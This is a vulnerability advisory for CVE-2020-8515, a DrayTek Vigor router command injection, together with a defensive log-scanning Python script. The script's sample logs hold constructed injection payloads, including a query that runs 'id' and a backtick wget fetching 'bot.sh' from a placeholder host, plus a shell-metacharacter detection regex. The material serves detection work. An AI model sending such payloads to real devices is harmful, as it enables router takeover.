Draytek Vigor Series (Multiple Devices) - Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') (CVE-2020-8515)
Description
DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices allow remote code execution as root (without authentication) via shell metacharacters to the cgi-bin/mainfunction.cgi URI.
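The description above identifies the only two facts a defender needs for log-based detection: the vulnerable endpoint (cgi-bin/mainfunction.cgi) and the attack primitive (shell metacharacters in the request). The following Python script is an added example, not part of this advisory or of DrayTek's code: it parses constructed web-server access-log lines in Combined Log Format, URL-decodes the query string of every request to that endpoint, and flags any that contain shell metacharacters. The log lines, IP addresses, parameter names and the metacharacter set are all constructed assumptions for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample access-log lines (Combined Log Format); not real traffic.
# Two lines carry shell metacharacters in the query to mainfunction.cgi, the
# rest are benign or hit other paths.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2025:08:15:02 +0000] "GET /cgi-bin/mainfunction.cgi?action=login&param=%3B%20id HTTP/1.1" 200 512 "-" "curl/7.68.0"
203.0.113.7 - - [10/Mar/2025:08:15:09 +0000] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 200 88 "-" "python-requests/2.25"
198.51.100.9 - - [10/Mar/2025:08:16:30 +0000] "GET /cgi-bin/mainfunction.cgi?action=login&user=alice HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Mar/2025:08:17:01 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Mar/2025:08:18:44 +0000] "GET /cgi-bin/mainfunction.cgi?x=%60wget%20http%3A%2F%2F203.0.113.5%2Fbot.sh%60 HTTP/1.1" 200 512 "-" "curl/7.68.0"
"""

# Combined Log Format: ip ident user [timestamp] "METHOD target PROTO" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Heuristic (assumption): characters that let a value break out of a shell
# argument. A lone '&' is a normal query separator, so only '&&' is listed.
SHELL_META_RE = re.compile(r'[;|`\n]|\$\(|&&|>|<')

VULN_PATH = "/cgi-bin/mainfunction.cgi"


def parse_line(line):
    """Return the named fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def flag_request(entry):
    """Return a reason string if the request targets the vulnerable CGI with
    shell metacharacters in its query string, else None."""
    parts = urlsplit(entry["target"])
    if not parts.path.endswith(VULN_PATH):
        return None
    # Decode twice: double-encoded payloads are a common way to slip past
    # filters that decode only once.
    decoded = unquote(unquote(parts.query))
    hit = SHELL_META_RE.search(decoded)
    if hit:
        return f"shell metacharacter {hit.group()!r} in query"
    return None


def scan_log(text):
    """Scan a whole log and return (ip, timestamp, reason) tuples for flagged requests."""
    findings = []
    for line in text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        reason = flag_request(entry)
        if reason:
            findings.append((entry["ip"], entry["ts"], reason))
    return findings


if __name__ == "__main__":
    for ip, ts, reason in scan_log(SAMPLE_LOG):
        print(f"{ts} {ip}: {reason}")
```

Two caveats when running this against real logs: the access log records only the request line, so a payload carried in a POST body (as in the second sample line) is invisible to this check and needs a reverse proxy or WAF that logs bodies; and any hit on a patched device (v1.5.1 or later) is still worth investigating, since the same source may be sweeping for other vulnerabilities in the same campaign.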
Threat Landscape & Known Exploitation
This vulnerability was reported by GreyNoise to have been exploited 'in the wild' during March 2025.
NOTE: In September 2024 the FBI, CNMF, NSA, NCSC and other national cybersecurity agencies issued a joint cybersecurity alert regarding the compromise of up to 260,000 Internet-connected devices in a campaign by Chinese (PRC)-linked cyber actors. The threat actors used a network of compromised nodes (a "botnet") as a proxy to conceal their identities while deploying distributed denial of service (DDoS) attacks or compromising targeted networks in the West. The botnet uses a customized variant of the 'Mirai' family of malware as a component of a system that automates the hijacking of devices including SOHO routers, firewalls and NAS devices. Compromise of a device is achieved by exploiting one of over 60 known and catalogued vulnerabilities, of which this CVE is one. Full details are available in the published NSA report.
Remediation
This issue has been fixed in Vigor3900/2960/300B v1.5.1. Update to the latest version.
Information
- Category: Command Injection
- CWE: CWE-78
- CVE: CVE-2020-8515
- Known Exploitation Activity
OWASP
- OWASP 2013: A1 - Injection
- OWASP 2017: A1 - Injection
- OWASP 2021: A3 - Injection